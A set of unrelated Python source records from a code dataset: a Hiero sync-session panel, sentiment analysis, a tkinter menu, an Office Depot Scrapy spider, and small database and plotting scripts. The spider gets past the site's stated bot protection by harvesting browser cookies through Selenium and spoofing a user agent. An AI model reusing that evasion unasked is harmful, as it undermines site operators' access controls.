clientDataProvider\n self._clientDataProvider.clientDataChanged.connect(self._clientDataChanged)\n self._clientDataProvider.clientDataCleared.connect(self._clearClientData)\n self._clientDataChanged()\n\n def leaveSession(self):\n if self._clientDataProvider is not None:\n self._clientDataProvider.clientDataChanged.disconnect(self._clientDataChanged)\n self._clientDataProvider.clientDataCleared.disconnect(self._clearClientData)\n self._clientDataProvider = None\n\n\ndef _colorHeaderMinWidth():\n # ToDo use the width of the icon.\n return 32\n\n\ndef _participantsHeaderMinWidth():\n # Size of the selected header showing a 3-digit number of participants plus an estimated size for the sort indicator.\n return QFontMetrics(QFont()).width(_participantsHeaderFormat.format(888)) + 32\n\n\nclass SyncStatusPanel(QWidget):\n \"\"\" Shows the current status of the participants of a sync review session. \"\"\"\n\n def __init__(self, connectionManager):\n QWidget.__init__(self)\n self._connectionManager = connectionManager\n\n self.setObjectName('uk.co.thefoundry.syncreviewstatus.1')\n self.setWindowTitle('Sync Session')\n self.setWindowIcon(QIcon('icons:SyncTab.png'))\n\n # Last column used for sorting the table. Used for disabling clicking on the color header for sorting.\n self._lastSortedColumn = -1\n # Last sort order used. Used for disabling clicking on the color header for sorting.\n self._lastSortedOrder = None\n\n # Models used by the window.\n self._model = _SyncReviewStatusModel(self)\n\n # Toolbar widgets.\n # The buttons' labels and actions and icons are set up by _updateConnectionState.\n self._hostButton = QPushButton('')\n self._hostAction = None\n self._connectButton = QPushButton('')\n self._connectButton.setToolTip(config.CONNECT_BUTTON_TOOL_TIP)\n self._connectAction = None\n\n # Create the push session button.\n pushIcon = QIcon('icons:SyncPush.png')\n pushIcon.addFile('icons:SyncPush_disabled.png', QSize(), QIcon.Disabled)\n self._pushSessionButton = QPushButton(pushIcon, '')\n self._pushSessionButton.setMaximumHeight(24)\n self._pushSessionButton.setToolTip(config.PUSH_SESSION_TOOL_TIP)\n self._pushSessionButton.clicked.connect(connectionManager.pushSession)\n self._pushSessionButton.setFocusPolicy(Qt.NoFocus)\n\n # Create the push session button.\n connectInfoIcon = QIcon('icons:SyncCopyInfo.png')\n connectInfoIcon.addFile('icons:SyncCopyInfo_disabled.png',\n QSize(), QIcon.Disabled)\n self._copyConnectionInfoButton = QPushButton(connectInfoIcon, '')\n self._copyConnectionInfoButton.setMaximumHeight(24)\n self._copyConnectionInfoButton.setToolTip(config.COPY_INFO_TOOL_TIP)\n self._copyConnectionInfoButton.clicked.connect(self._copyConnectionInfo)\n self._copyConnectionInfoButton.setFocusPolicy(Qt.NoFocus)\n\n # Toolbar setup.\n toolbarLayout = QHBoxLayout()\n toolbarLayout.setAlignment(Qt.AlignLeft)\n toolbarLayout.setContentsMargins(5, 5, 5, 0)\n toolbarLayout.addWidget(self._hostButton)\n toolbarLayout.addWidget(self._connectButton)\n toolbarLayout.addWidget(self._copyConnectionInfoButton)\n toolbarLayout.addWidget(self._pushSessionButton)\n\n # Main view.\n self._tableView = QTableView()\n self._sortModel = QSortFilterProxyModel()\n self._sortModel.setSourceModel(self._model)\n self._tableView.setModel(self._sortModel)\n # Disable the vertical header.\n self._tableView.verticalHeader().setVisible(False)\n # Set the sizes of each column on the horizontal header.\n self._tableView.setColumnWidth(_Columns.color, _colorHeaderMinWidth())\n self._tableView.setColumnWidth(\n _Columns.participant, _participantsHeaderMinWidth())\n self._tableView.horizontalHeader().setStretchLastSection(True)\n # Table style.\n self._tableView.setGridStyle(Qt.NoPen)\n self._tableView.setAlternatingRowColors(True)\n # Disable selection.\n self._tableView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self._tableView.setFocusPolicy(Qt.NoFocus)\n self._tableView.setSelectionMode(QAbstractItemView.NoSelection)\n # Table sorting.\n self._tableView.setSortingEnabled(True)\n # Do not show a sort indicator on launch.\n self._setUnsorted()\n\n # Disable clicking on the color header for sorting.\n self._tableView.horizontalHeader().sortIndicatorChanged.connect(self._ignoreClicksOnColorHeader)\n\n # Main layout configuration.\n mainLayout = QVBoxLayout()\n mainLayout.addLayout(toolbarLayout)\n mainLayout.addWidget(self._tableView)\n self.setLayout(mainLayout)\n\n # Connection state\n self._updateConnectionState(ConnectionState.DISCONNECTED)\n connectionManager.connectionState.changed.connect(self._updateConnectionState)\n\n def getSortedColumn(self):\n \"\"\" Column that is currently being sorted. Holds a negative value if the table is currently not sorted. \"\"\"\n return self._lastSortedColumn\n\n def getSortedOrder(self):\n \"\"\" Current sort order. If getSortedColumn is negative, it will return None. \"\"\"\n return self._lastSortedOrder\n\n def _setUnsorted(self):\n # After calling this method no sort indicator will be shown and the model will return to its natural, unsorted\n # order.\n self._lastSortedColumn = -1\n self._tableView.horizontalHeader().setSortIndicator(\n self._lastSortedColumn, Qt.SortOrder.AscendingOrder)\n\n def _ignoreClicksOnColorHeader(self, newSortedColumn, _):\n if newSortedColumn == _Columns.color:\n # If the user clicked on the color header, restore the sort indicator status from before the click.\n if self._lastSortedColumn in (_Columns.participant, _Columns.status):\n self._tableView.horizontalHeader().setSortIndicator(\n self._lastSortedColumn, self._lastSortedOrder)\n else:\n self._setUnsorted()\n else:\n # Store the sort indicator status for the next click.\n self._lastSortedColumn = newSortedColumn\n if newSortedColumn != -1:\n self._lastSortedOrder = self._tableView.horizontalHeader().sortIndicatorOrder()\n\n def _updateHostButton(self, state):\n self._hostButton.setText(\n 'Host' if state != ConnectionState.SERVER_RUNNING else 'End Session')\n self._hostButton.setToolTip(config.HOST_BUTTON_TOOL_TIP if state !=\n ConnectionState.SERVER_RUNNING else config.END_SESSION_BUTTON_TOOL_TIP)\n self._hostButton.setEnabled(\n state in (ConnectionState.DISCONNECTED, ConnectionState.SERVER_RUNNING))\n if self._hostAction is not None:\n self._hostButton.pressed.disconnect(self._hostAction)\n\n hostActionName = 'foundry.application.{}'.format(\n 'hostSession' if state != ConnectionState.SERVER_RUNNING else 'endSession')\n self._hostAction = hiero.ui.findMenuAction(hostActionName).trigger\n self._hostButton.pressed.connect(self._hostAction)\n\n def _updateConnectButton(self, state):\n self._connectButton.setText(\n 'Connect' if state != ConnectionState.CLIENT_CONNECTED else 'Disconnect')\n self._connectButton.setEnabled(\n state in (ConnectionState.DISCONNECTED, ConnectionState.CLIENT_CONNECTED))\n if self._connectAction is not None:\n self._connectButton.pressed.disconnect(self._connectAction)\n\n connectActionName = 'foundry.application.{}'.format(\n 'connectSession' if state != ConnectionState.CLIENT_CONNECTED else 'disconnectSession')\n self._connectAction = hiero.ui.findMenuAction(connectActionName).trigger\n self._connectButton.pressed.connect(self._connectAction)\n\n def _updateConnectionState(self, state):\n self._updateHostButton(state)\n self._updateConnectButton(state)\n self._copyConnectionInfoButton.setEnabled(state == ConnectionState.SERVER_RUNNING)\n self._pushSessionButton.setEnabled(\n state in (ConnectionState.SERVER_RUNNING, ConnectionState.CLIENT_CONNECTED))\n if state == ConnectionState.DISCONNECTED:\n self._model.leaveSession()\n elif state in (ConnectionState.SERVER_RUNNING, ConnectionState.CLIENT_CONNECTED):\n self._model.enterSession(self._connectionManager.session.clientDataProvider())\n\n def _copyConnectionInfo(self):\n \"\"\" Copies the connection info of the server into the clipboard. \"\"\"\n connectionInfo = self._connectionManager.getConnectionInfo()\n if connectionInfo:\n QApplication.clipboard().setText(connectionInfo)\n toolTipPosition = self.mapToGlobal(self._copyConnectionInfoButton.pos())\n # Adjust tooltip position so it doesn't cover the button\n toolTipPosition += QPoint(0, 10)\n QToolTip.showText(toolTipPosition,\n 'Connection info successfully copied to clipboard',\n self._copyConnectionInfoButton,\n self._copyConnectionInfoButton.rect(),\n 3000)\n\n\n# Global instance of the sync review status panel.\n_statusPanelInstance = None\n\n\ndef initialise(connectionManager):\n \"\"\" Initialize the global instance of the sync review status panel. \"\"\"\n global _statusPanelInstance\n try:\n _statusPanelInstance = SyncStatusPanel(connectionManager)\n hiero.ui.windowManager().addWindow(_statusPanelInstance)\n except Exception as ex:\n print('Initialization of the sync review status panel failed: {}'.format(ex))\n\n\ndef openStatusPanelIfClosed():\n \"\"\" Opens the status panel in a floating window if it's closed and the user preference is to open\n it on session startup\"\"\"\n if (not _statusPanelInstance):\n return\n\n settings = hiero.core.ApplicationSettings()\n if (not _statusPanelInstance.isVisible() and settings.boolValue(config.OPEN_PANEL_ON_STARTUP_KEY)):\n hiero.ui.windowManager().popupWindow(_statusPanelInstance)\n","repo_name":"sisoe24/nuke-python-stubs","sub_path":"stubs/hiero/syncreview/syncreviewstatuspanel.py","file_name":"syncreviewstatuspanel.py","file_ext":"py","file_size_in_byte":14458,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"69986266778","text":"from pysentimiento import create_analyzer\n\n# Create sentiment, emotion and hate speech analyzers in Spanish\nsentiment_analyzer = create_analyzer(task=\"sentiment\", lang=\"es\")\nemotion_analyzer = create_analyzer(task=\"emotion\", lang=\"es\")\nhate_speech_analyzer = create_analyzer(task=\"hate_speech\", lang=\"es\")\n\ndef analyze_text(text):\n sentiment_output = sentiment_analyzer.predict(text)\n emotion_output = emotion_analyzer.predict(text)\n hate_speech_output = hate_speech_analyzer.predict(text)\n\n sentiment_values = sentiment_output.probas\n emotion_values = emotion_output.probas\n hate_speech_values = hate_speech_output.probas\n\n return sentiment_values, emotion_values, hate_speech_values\n\ns, e, h = analyze_text(\"hoy me desperté sintiéndome genial\")\nprint(s, e, h)","repo_name":"joacoponfe/Modos_App","sub_path":"public/assets/python/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5070261727","text":"import tkinter as tk\n\n\nclass StartPage(tk.Frame):\n def donothing(self):\n filewin = tk.Toplevel(self.master)\n button = tk.Button(filewin, text=\"Do nothing button\")\n button.pack()\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n heading = tk.Label(\n self,\n bg=\"white\",\n fg=\"black\",\n text='Tugas Akhir',\n font='none 24 bold'\n )\n heading.place(relx=0.5, rely=0.1, anchor=tk.CENTER)\n\n text_elements = [\n \"Memasukkan Pesan ke Gambar\",\n \"Mengekstraksi Pesan dari Gambar\",\n \"Confidentiality Pesan\",\n \"Recovery Pesan\"\n ]\n\n command_elements = [\n lambda: controller.show_frame(\"ImageInsertionForm\"),\n lambda: controller.show_frame(\"ImageExtractForm\"),\n lambda: controller.show_frame(\"ImageExtractFormnoAES\"),\n lambda: controller.show_frame(\"ImageRecoveryForm\"),\n ]\n\n index = 0\n for text in text_elements:\n button = tk.Button(\n self,\n bg='white',\n fg='black',\n text=text,\n command=command_elements[index],\n width=50,\n height=2\n )\n button.place(relx=0.5, rely=0.1*(index+2), anchor=tk.CENTER)\n index += 1\n","repo_name":"muharisfebriansyah/TugasAkhir","sub_path":"src/gui/pages/start_page.py","file_name":"start_page.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"73604399577","text":"from __future__ import division, absolute_import, unicode_literals\n\nimport json\nimport re\nimport time\nimport socket\nimport urlparse\nimport urllib\nimport os\nimport string\n\nfrom scrapy import Request\n\nfrom product_ranking.items import SiteProductItem, RelatedProduct, Price, \\\n BuyerReviews\nfrom product_ranking.spiders import BaseProductsSpider, cond_set, \\\n cond_set_value\nfrom product_ranking.br_bazaarvoice_api_script import BuyerReviewsBazaarApi\n\nfrom datetime import datetime\n\nis_empty =lambda x,y=None: x[0] if x else y\n\n\ndef is_num(s):\n try:\n int(s.strip())\n return True\n except ValueError:\n return False\n\n\nclass OfficedepotProductsSpider(BaseProductsSpider):\n name = 'officedepot_products'\n allowed_domains = [\"officedepot.com\", \"www.officedepot.com\", 'bazaarvoice.com']\n start_urls = []\n _extra_requests = False\n # settings = DockersValidatorSettings\n\n SEARCH_URL = \"http://www.officedepot.com/catalog/search.do?Ntt={search_term}&searchSuggestion=true&akamai-feo=off\"\n\n PAGINATE_URL = ('http://www.officedepot.com/catalog/search.do?Ntx=mode+matchpartialmax&Nty=1&Ntk=all'\n '&Ntt={search_term}&N=5&recordsPerPageNumber=24&No={nao}'\n )\n\n CURRENT_NAO = 0\n PAGINATE_BY = 24 # 24 products\n TOTAL_MATCHES = None # for pagination\n\n REVIEW_URL = \"http://officedepot.ugc.bazaarvoice.com/2563\" \\\n \"/{product_id}/reviews.djs?format=embeddedhtml\"\n\n VARIANTS_URL = 'http://www.officedepot.com/mobile/getSkuAvailable' \\\n 'Options.do?familyDescription={name}&sku={sku}&noLogin=true'\n QA_URL = \"http://officedepot.ugc.bazaarvoice.com/answers/2563/product/{product_id}/questions.djs?format=embeddedhtml\"\n #\n # RELATED_PRODUCT = \"http://www.res-x.com/ws/r2/Resonance.aspx?\" \\\n # \"appid=dockers01&tk=187015646137297\" \\\n # \"&ss=182724939426407\" \\\n # \"&sg=1&\" \\\n # \"&vr=5.3x&bx=true\" \\\n # \"&sc=product4_rr\" \\\n # \"&sc=product3_rr\" \\\n # \"&sc=product1_r\" \\\n # \"r&sc=product2_rr\" \\\n # \"&ev=product&ei={product_id}\" \\\n # \"&no=20\" \\\n # \"&language=en_US\" \\\n # \"&cb=certonaResx.showResponse\" \\\n # \"&ur=http%3A%2F%2Fwww.levi.com%2FUS%2Fen_US%\" \\\n # \"2Fwomens-jeans%2Fp%2F095450043&plk=&\"\n\n\n def __init__(self, *args, **kwargs):\n self.br = BuyerReviewsBazaarApi(called_class=self)\n # officedepot seems to have a bot protection, so we first get the cookies\n # and parse the site with them after that\n self.proxy = None\n self.timeout = 60\n self.width = 1024\n self.height = 768\n self.selenium_cookies = {}\n self.user_agent = ('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36'\n ' (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36')\n socket.setdefaulttimeout(60)\n self._get_selenium_cookies_for_main_page()\n if kwargs.get('scrape_variants_with_extra_requests'):\n self._extra_requests = True\n super(OfficedepotProductsSpider, self).__init__(\n site_name=self.allowed_domains[0], *args, **kwargs)\n\n def _prepare_driver(self, driver):\n driver.set_page_load_timeout(int(self.timeout))\n driver.set_script_timeout(int(self.timeout))\n driver.set_window_size(int(self.width), int(self.height))\n\n def _get_selenium_cookies_for_main_page(self):\n from pyvirtualdisplay import Display\n display = Display(visible=False)\n display.start()\n driver = self._init_chromium()\n self._prepare_driver(driver)\n try:\n driver.get('http://' + self.allowed_domains[0])\n time.sleep(10)\n for cookie in driver.get_cookies():\n self.selenium_cookies[cookie['name']] = cookie['value']\n driver.quit()\n except Exception as e:\n driver.quit()\n time.sleep(10)\n self.log('Error getting cookies from homepage, trying one more time: %s' % str(e))\n driver.get('http://' + self.allowed_domains[0])\n time.sleep(10)\n for cookie in driver.get_cookies():\n self.selenium_cookies[cookie['name']] = cookie['value']\n try:\n driver.quit()\n display.stop()\n except Exception as e:\n self.log('Error on driver & display destruction: %s' % str(e))\n\n def _init_chromium(self):\n from selenium import webdriver\n from selenium.webdriver.remote.remote_connection import RemoteConnection\n RemoteConnection.set_timeout(30)\n chrome_flags = webdriver.DesiredCapabilities.CHROME # this is for Chrome?\n chrome_options = webdriver.ChromeOptions() # this is for Chromium\n if self.proxy:\n chrome_options.add_argument(\n '--proxy-server=%s' % self.proxy_type+'://'+self.proxy)\n chrome_flags[\"chrome.switches\"] = ['--user-agent=%s' % self.user_agent]\n chrome_options.add_argument('--user-agent=%s' % self.user_agent)\n executable_path = '/usr/sbin/chromedriver'\n if not os.path.exists(executable_path):\n executable_path = '/usr/local/bin/chromedriver'\n # initialize webdriver, open the page and make a screenshot\n driver = webdriver.Chrome(desired_capabilities=chrome_flags,\n chrome_options=chrome_options,\n executable_path=executable_path)\n return driver\n\n def _init_firefox(self):\n from selenium import webdriver\n from selenium.webdriver.remote.remote_connection import RemoteConnection\n RemoteConnection.set_timeout(30)\n profile = webdriver.FirefoxProfile()\n profile.set_preference(\"general.useragent.override\", self.user_agent)\n profile.set_preference(\"network.proxy.type\", 1) # manual proxy configuration\n if self.proxy:\n if 'socks' in self.proxy_type:\n profile.set_preference(\"network.proxy.socks\", self.proxy.split(':')[0])\n profile.set_preference(\"network.proxy.socks_port\", int(self.proxy.split(':')[1]))\n else:\n profile.set_preference(\"network.proxy.http\", self.proxy.split(':')[0])\n profile.set_preference(\"network.proxy.http_port\", int(self.proxy.split(':')[1]))\n profile.update_preferences()\n driver = webdriver.Firefox(profile)\n return driver\n\n def _parse_single_product(self, response):\n return self.parse_product(response)\n\n @staticmethod\n def _get_product_id(url):\n match = re.search(r'/products/(\\d{2,20})/', url)\n if match:\n return match.group(1)\n\n def parse_product(self, response):\n meta = response.meta\n product = meta.get('product', SiteProductItem())\n reqs = []\n meta['reqs'] = reqs\n\n product['_subitem'] = True\n\n # Parse locate\n locale = 'en_US'\n cond_set_value(product, 'locale', locale)\n\n # Parse title\n title = self.parse_title(response)\n cond_set(product, 'title', title, conv=string.strip)\n\n # Parse image\n image = self.parse_image(response)\n cond_set(product, 'image_url', image)\n\n # Parse brand\n brand = self.parse_brand(response)\n cond_set_value(product, 'brand', brand)\n\n # Parse sku\n sku = self.parse_sku(response)\n cond_set_value(product, 'sku', sku)\n\n # Parse description\n description = self.parse_description(response)\n cond_set_value(product, 'description', description)\n\n # Parse price\n price = self.parse_price(response)\n cond_set_value(product, 'price', price)\n\n # Parse model\n model = self._parse_model(response)\n cond_set_value(product, 'model', model)\n\n # Parse reseller_id\n reseller_id = self.parse_reseller_id(response)\n cond_set_value(product, \"reseller_id\", reseller_id)\n\n # Parse is out of stock\n oos = self._parse_is_out_of_stock(response)\n cond_set_value(product, 'is_out_of_stock', oos)\n\n # Parse categories and category\n categories = self._parse_categories(response)\n cond_set_value(product, 'categories', categories)\n if categories:\n cond_set_value(product, 'category', categories[-1])\n\n # Parse related products\n related_product = self._parse_related_product(response)\n cond_set_value(product, 'related_products', related_product)\n\n br_count = is_empty(re.findall(r'(\\d+)<\\/span>',\n response.body_as_unicode()))\n meta['_br_count'] = br_count\n meta['product'] = product\n\n reqs.append(Request(\n url=self.REVIEW_URL.format(product_id=self._get_product_id(\n response.url)),\n dont_filter=True,\n callback=self.parse_buyer_reviews,\n meta=meta\n ))\n\n sku = is_empty(response.xpath('//input[@name=\"id\"]/@value').extract())\n name = is_empty(response.xpath(\n '//h1[@itemprop=\"name\"]/text()').re('(.*?),'))\n\n if sku and name and self.scrape_variants_with_extra_requests:\n name = urllib.quote_plus(name.strip().encode('utf-8'))\n reqs.append(Request(url=self.VARIANTS_URL.format(name=name,\n sku=sku),\n callback=self._parse_variants,\n meta=meta))\n # parse questions & answers\n reqs.append(Request(\n url=self.QA_URL.format(product_id=self._get_product_id(\n response.url)),\n callback=self._parse_questions,\n meta=meta,\n dont_filter=True\n ))\n\n if reqs:\n return self.send_next_request(reqs, response)\n return product\n\n def parse_reseller_id(self, response):\n regex = \"\\/(\\d+)\"\n reseller_id = re.findall(regex, response.url)\n reseller_id = reseller_id[0] if reseller_id else None\n return reseller_id\n\n def _parse_questions(self, response):\n meta = response.meta\n reqs = response.meta['reqs']\n product = response.meta['product']\n qa = []\n questions_ids_regex = \"\"\"BVQAQuestionSummary.+?javascript:void.+?>([^<]+)[^\"']+[\"']BVQAQuestionMain(\\d+)(?:.+?BVQAQuestionDetails.+?div>([^<]+)?).+?BVQAElapsedTime.+?>([^<]+)\"\"\"\n questions_ids = re.findall(questions_ids_regex, response.body_as_unicode())\n for (question_summary, question_id, question_details, question_date) in questions_ids:\n # Convert date format\n if question_date:\n try:\n from dateutil.relativedelta import relativedelta\n years = re.findall(\"(\\d+?)\\s+?years\", question_date)\n years = years[0] if years else '0'\n years = int(years) if years.isdigit() else '0'\n months = re.findall(\"(\\d+?)\\s+?months\", question_date)\n months = months[0] if months else '0'\n months = int(months) if months.isdigit() else '0'\n if not months and not years:\n converted_date = None\n else:\n converted_date = datetime.now() - relativedelta(years=years, months=months)\n converted_date = converted_date.strftime(\"%Y-%m-%d\")\n except Exception as e:\n converted_date = None\n self.log('Failed to parse date, setting date to None {}'.format(e))\n else:\n converted_date = None\n # regex to get part of response that contain all answers to question with given id\n text_r = \"BVQAQuestion{}Answers(.+?)BVQAQuestionDivider\".format(question_id)\n all_a_text = re.findall(text_r, response.body_as_unicode())\n all_a_text = ''.join(all_a_text[0]) if all_a_text else ''\n answers_regex = r\"Answer:.+?>([^<]+)\"\n answers = re.findall(answers_regex, all_a_text)\n answers = [{'answerText':a} for a in answers]\n question = {\n 'questionDate': converted_date,\n 'questionId': question_id,\n 'questionDetail': question_details.strip() if question_details else '',\n 'qestionSmmary': question_summary.strip() if question_summary else '',\n 'answers': answers,\n 'totalAnswersCount': len(answers)\n }\n qa.append(question)\n product['all_questions'] = qa\n if reqs:\n return self.send_next_request(reqs, response)\n return product\n\n def clear_text(self, str_result):\n return str_result.replace(\"\\t\", \"\").replace(\"\\n\", \"\").replace(\"\\r\", \"\").replace(u'\\xa0', ' ').strip()\n\n def _parse_is_out_of_stock(self, response):\n oos = response.xpath(\n '//*[@itemprop=\"availability\"'\n ' and @content=\"http://schema.org/OutOfStock\"]')\n return bool(oos)\n\n def _parse_model(self, response):\n model = response.xpath(\n '//*[@id=\"attributemodel_namekey\"]/text()').extract()\n if model:\n return model[0].strip()\n\n def _parse_categories(self, response):\n categories = response.xpath(\n '//*[@id=\"siteBreadcrumb\"]//'\n 'span[@itemprop=\"name\"]/text()').extract()\n return categories\n\n def _parse_related_product(self, response):\n results = []\n base_url = response.url\n for related_product in response.xpath(\n '//*[@id=\"relatedItems\"]'\n '//tr[contains(@class,\"hproduct\")]'\n '/td[@class=\"description\"]/a'):\n name = is_empty(related_product.xpath('text()').extract())\n url = is_empty(related_product.xpath('@href').extract())\n if name and url:\n results.append(RelatedProduct(title=name,\n url=urlparse.urljoin(base_url,\n url)))\n return results\n\n def _parse_variants(self, response):\n \"\"\"\n Parses product variants.\n \"\"\"\n reqs = response.meta['reqs']\n product = response.meta['product']\n data = json.loads(response.body)\n variants = []\n\n if data.get('success'):\n for sku in data.get('skus', []):\n vr = {}\n vr['url'] = urlparse.urljoin(response.url, sku.get('url'))\n vr['skuId'] = sku.get('sku')\n price = is_empty(re.findall(\n '\\$([\\d\\.]+)', sku.get('attributesDescription', '')))\n if price:\n vr['price'] = price\n\n name = sku.get('description', '')\n if name:\n vr['properties'] = {'title': name}\n\n vr['image_url'] = sku.get('thumbnailImageUrl').split('?')[0]\n variants.append(vr)\n\n product['variants'] = variants\n if product.get('variants') and self._extra_requests:\n variants_urls = [p.get('url') for p in product['variants']]\n for var_url in variants_urls:\n req = Request(url=var_url, callback=self._parse_in_stock_for_variants)\n req.meta['product'] = product\n reqs.append(req)\n if reqs:\n return self.send_next_request(reqs, response)\n\n return product\n\n # parse variants one by one and set out of stock status for each variant\n def _parse_in_stock_for_variants(self, response):\n reqs = response.meta['reqs']\n product = response.meta['product']\n oos = self._parse_is_out_of_stock(response)\n for variant in product['variants']:\n if variant['url'] == response.url:\n variant['in_stock'] = not oos\n break\n if reqs:\n return self.send_next_request(reqs, response)\n return product\n\n def parse_buyer_reviews(self, response):\n meta = response.meta.copy()\n reqs = meta['reqs']\n\n self.br.br_count = meta['_br_count']\n buyer_reviews_per_page = self.br.parse_buyer_reviews_per_page(response)\n\n product = response.meta['product']\n product['buyer_reviews'] = BuyerReviews(**buyer_reviews_per_page)\n\n if reqs:\n return self.send_next_request(reqs, response)\n\n return product\n\n def send_next_request(self, reqs, response):\n \"\"\"\n Helps to handle several requests\n \"\"\"\n req = reqs.pop(0)\n new_meta = response.meta.copy()\n if reqs:\n new_meta[\"reqs\"] = reqs\n\n return req.replace(meta=new_meta)\n\n def parse_brand(self, response):\n brand = is_empty(response.xpath(\n '//td[@itemprop=\"brand\"]/@content').extract())\n if not brand:\n brand = is_empty(response.xpath(\n '//td[@itemprop=\"brand\"]/text()').extract())\n if brand:\n brand = brand.strip()\n return brand\n\n def parse_title(self, response):\n title = response.xpath(\n '//h1[contains(@itemprop, \"name\")]/text()').extract()\n return title\n\n def parse_data(self, response):\n data = re.findall(r'var MasterTmsUdo \\'(.+)\\'; ', response.body_as_unicode())\n if data:\n data = re.sub(r'\\\\(.)', r'\\g<1>', data[0])\n try:\n js_data = json.loads(data)\n except:\n return\n return js_data\n\n def parse_image(self, response):\n img = response.xpath('//img[contains(@id, \"mainSkuProductImage\")]/@src').extract()\n return img\n\n def parse_description(self, response):\n description = response.xpath('//div[contains(@class, \"sku_desc\")]').extract()\n if description:\n return self.clear_text(description[0])\n else:\n return ''\n\n def parse_sku(self, response):\n sku = response.xpath('//td[contains(@id, \"basicInfoManufacturerSku\")]/text()').extract()\n # sku = response.xpath('//div[contains(@id, \"skuValue\")]/text()').extract()\n if sku:\n return self.clear_text(sku[0])\n\n def parse_price(self, response):\n\n price = response.xpath('//meta[contains(@itemprop, \"price\")]/@content').extract()\n currency = response.xpath('//meta[contains(@itemprop, \"priceCurrency\")]/@content').extract()\n\n if price and currency:\n price = Price(price=price[0], priceCurrency=currency[0])\n else:\n price = Price(price=0.00, priceCurrency=\"USD\")\n\n return price\n\n def parse_paginate_link(self, response, nao):\n check_page = '&No=%s' % nao\n for link in response.xpath(\n '//a[contains(@class, \"paging\")]/@href'\n ).extract():\n if check_page in link:\n u = urlparse.urlparse(link)\n return urlparse.urljoin('http://www.officedepot.com', u.path)\n\n def parse_category_link(self, response):\n categories_links = []\n for link in response.xpath(\n '//div[contains(@class, \"category_wrapper\")]/a[contains(@class, \"link\")]/@href'\n ).extract():\n categories_links.append(link)\n\n def _scrape_total_matches(self, response):\n totals = response.xpath('//div[contains(@id, \"resultCnt\")]/text()').extract()\n if totals:\n totals = totals[0].replace(',', '').replace('.', '').strip()\n if totals.isdigit():\n if not self.TOTAL_MATCHES:\n self.TOTAL_MATCHES = int(totals)\n return int(totals)\n\n def _scrape_product_links(self, response):\n items = response.xpath(\n '//div[contains(@class, \"descriptionFull\")]/'\n 'a[contains(@class, \"med_txt\")]/@href'\n ).extract() or response.css('.desc_text a::attr(\"href\")').extract()\n # Scraper was redirected to product page instead of search results page\n if not items and \"officedepot.com/a/products\" in response.url:\n prod = SiteProductItem(search_redirected_to_product=True)\n # TODO we may not need any data for product aside from \"search_redirected_to_product\" flag.\n # Rework if that's the case - CON-28287\n req = Request(response.url, callback=self.parse_product, dont_filter=True)\n req.meta[\"remaining\"] = 0\n req.meta['product'] = prod\n yield req, prod\n else:\n for link in items:\n yield link, SiteProductItem()\n\n def _get_nao(self, url):\n nao = re.search(r'nao=(\\d+)', url)\n if not nao:\n return\n return int(nao.group(1))\n\n def _replace_nao(self, url, new_nao):\n current_nao = self._get_nao(url)\n if current_nao:\n return re.sub(r'nao=\\d+', 'nao='+str(new_nao), url)\n else:\n return url+'&nao='+str(new_nao)\n\n def _scrape_next_results_page_link(self, response):\n if self.TOTAL_MATCHES is None:\n self.log('No \"next result page\" link!')\n # # TODO: check result by categories\n # return self.parse_category_link(response)\n return\n #if self.CURRENT_NAO > self.TOTAL_MATCHES+self.PAGINATE_BY:\n # return # all the products have been collected\n if self.CURRENT_NAO > self.quantity+self.PAGINATE_BY:\n return # num_products > quantity\n self.CURRENT_NAO += self.PAGINATE_BY\n if '/a/browse/' in response.url: # paginate in category or subcategory\n new_paginate_url = self.parse_paginate_link(response, self.CURRENT_NAO)\n if new_paginate_url:\n return Request(new_paginate_url, callback=self.parse, meta=response.meta,\n cookies=self.selenium_cookies)\n return Request(\n self.PAGINATE_URL.format(\n search_term=response.meta['search_term'],\n nao=str(self.CURRENT_NAO)),\n callback=self.parse, meta=response.meta,\n cookies=self.selenium_cookies\n )\n","repo_name":"lifelonglearner127/tmtext","sub_path":"product-ranking/product_ranking/spiders/officedepot.py","file_name":"officedepot.py","file_ext":"py","file_size_in_byte":22480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24555895488","text":"'''\nimport MySQLdb\n\n# 连接到数据库\nconn = MySQLdb.connect(\n host=\"localhost\",\n user=\"papupupu\",\n password=\"123456\",\n db=\"test\"\n)\n\n# 创建一个游标对象\ncursor = conn.cursor()\n\n# 构建 SQL 插入语句\ndata = {\"name\": \"John\", \"age\": 30, \"gender\": \"male\", \"height\": 180}\nkeys = [\"name\", \"age\", \"gender\"]\nvalues = [data[k] for k in keys]\nsql = \"INSERT INTO my_table ({}) VALUES ({})\".format(\n \",\".join(keys),\n \",\".join([\"%s\"] * len(values))\n)\n\n# 执行 SQL 插入语句\ncursor.execute(sql, values)\n\n# 提交更改\nconn.commit()\n\n# 关闭游标和数据库连接\ncursor.close()\nconn.close()\n'''\nimport re\n\nmy_string = str(\"This is a \\\\r\\\\nmulti-line string.\")\nmy_string = re.sub(r\"\\\\r\\\\n\", \"\", my_string)\nprint(my_string)\nprint(\"end\")\n","repo_name":"papupupu/mynote","sub_path":"linux网络编程资料/day5/4-源代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14710581567","text":"\"\"\"\nTop level script.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom lib.data_loader import master\n\nif __name__ == \"__main__\":\n df = master()\n\n # Visualize using Seaborn and Matplotlib\n sns.set(style=\"whitegrid\")\n\n # Scatter plot\n plt.figure(figsize=(10, 6))\n sns.scatterplot(data=df.to_pandas(), x=\"literacy_rate\", y=\"gdp_pc\")\n plt.title(\"Scatter Plot of Litercy vs. GDP Per Capita\")\n plt.xlabel(\"Literacy Rate\")\n plt.ylabel(\"GDP Per Capita\")\n 